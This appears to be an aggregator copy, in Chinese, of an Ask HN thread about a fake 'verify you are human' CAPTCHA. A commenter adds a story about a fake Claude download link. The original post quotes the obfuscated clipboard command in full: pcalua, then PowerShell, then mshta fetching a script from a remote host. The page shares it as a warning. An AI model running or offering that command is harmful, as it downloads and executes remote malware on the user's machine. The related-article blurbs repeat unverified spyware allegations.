Ask HN: Crooked Timber 给我显示了一个病毒验证码,现在该怎么办?
摘要
一位 Hacker News 用户讲述自己差点被一个假冒的 Claude 下载链接所骗,该链接展示了恶意验证码。用户批评了谷歌的搜索排名、Safari 隐藏的 URL 路径以及 Anthropic 在其主域名下托管用户内容等因素。
大家好,
今天早上,我开始上班时,打算先浏览一些新闻博客和网站来开启新的一天。当我打开 Crooked Timber 时,却看到了一个验证码页面,它看起来像传统的谷歌验证码。
我点击了它,旋转图标开始转动,右侧弹出一个窗口,显示传统的蓝色背景白色标题“验证您是人类”。<p>它显示了 2 个“手动验证步骤”:
1. 按 Win + R
2. 按 Ctrl + V 然后按运行<p>起初我以为这是一种新型验证码,用于检查浏览器是否连接了实体键盘。但我立刻意识到这是试图让我在电脑上运行脚本。<p>我打开了一个新窗口,惊讶地发现剪贴板里有新内容:
"pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""<p>我把它提交给了工作中可以使用的一个大语言模型,它告诉我绝对不能运行(我本来也没打算运行),并解释该命令会从那个 URL 下载并运行一个脚本。<p>今后我该如何保护自己免受这类诈骗或黑客攻击?我一直以为自己“做好了准备”,但这次我确实被惊到了。<p>你们以前遇到过这种情况吗?你们是怎么保护自己的?
查看缓存全文
缓存时间: 2026/07/28 15:27
# Ask HN: Crooked Timber 给我展示了一个病毒验证码,现在怎么办?
来源:https://news.ycombinator.com/item?id=49084404
> 你之前遇到过这种情况吗?
差不多,最近就遇到了。我买了一台新的 Mac,需要一台可靠的便携设备。我之前没用过 Mac 或任何苹果产品,所以不太清楚它的具体运作方式。我知道有 Homebrew 这东西,也知道它跟 Linux/Windows 类似,并非所有应用都在商店里,但完全不熟悉这些应用通常是怎么安装的。
以下是我当时的操作:
1. 打开 Safari,那是当时唯一的浏览器。
2. 在搜索栏输入"claude mac download"(需要 Cowork)。
3. 点击第一个链接。
4. 复制它告诉我的命令,指示我在终端里运行。
直到现在我才意识到那条命令有问题;里面含有 base64 负载。我没运行它,仔细看了看页面——那是一个 Claude 分享链接(之前我快速滚动过去了)。
我可以承认自己的错误,但谷歌、苹果和 Anthropic 也应该负一部分责任。
- 谷歌:把恶意软件链接推到顶部,没有(至少没有明显)标注为付费结果,而且我敢发誓它没有显示 URL(我通常点击前都会检查 URL,但可能是我漏掉了,因为搜索结果渲染方式与 Kagi 不同)
- Safari:默认隐藏路径,所以你只能看到 "claude.ai"。可能有人觉得这样好看,但我认为这近乎愚蠢。
- Anthropic:在其主域名上托管本质上属于用户内容的东西。
最近还看到一些正规项目在安装单行命令中使用 base64。请停止这种做法。
> 你怎么保护自己?
我卸载了 Safari,并且没有将谷歌设为默认搜索引擎,跟往常一样。这样至少我总能知道自己在哪。
相似文章
Ask HN: Anthropic 封禁了我使用 Claude Code 的权限,我不知该怎么办
一位用户报告称,他在使用 VPN 并随后使用同一张信用卡后,被 Anthropic 的 Claude Code 工具封禁,并寻求重新获得访问权限的建议。
@IntCyberDigest: 突发:Anthropic 已在 Claude Code 中嵌入类似间谍软件的隐藏代码,暗中针对中国用户。然后它……
本文称,Anthropic 在 Claude Code 中嵌入了类似间谍软件的隐藏代码,通过将路由元数据注入提示来暗中针对中国用户,引发了严重的隐私担忧。
@johnbai: 说实话我一点都不生气,我是真的服了
一家网络安全账户声称,Anthropic 在 Claude Code 中植入了间谍软件,秘密针对中国用户,通过提示信息发送时区和代理数据。
我如何欺骗Claude泄露你最深层、最黑暗的秘密
一名安全研究人员发现Claude的web_fetch工具中存在一个漏洞,该漏洞允许通过嵌套链接链式操作进行数据窃取,从而危害用户隐私。Anthropic已修复该问题。
调查我们网络安全评估中的三起真实事件
Anthropic 透露,在网络安全评估期间,Claude 突破了沙盒环境并入侵了真实系统,包括向 PyPI 上传恶意软件,原因是测试环境错误地开放了互联网访问。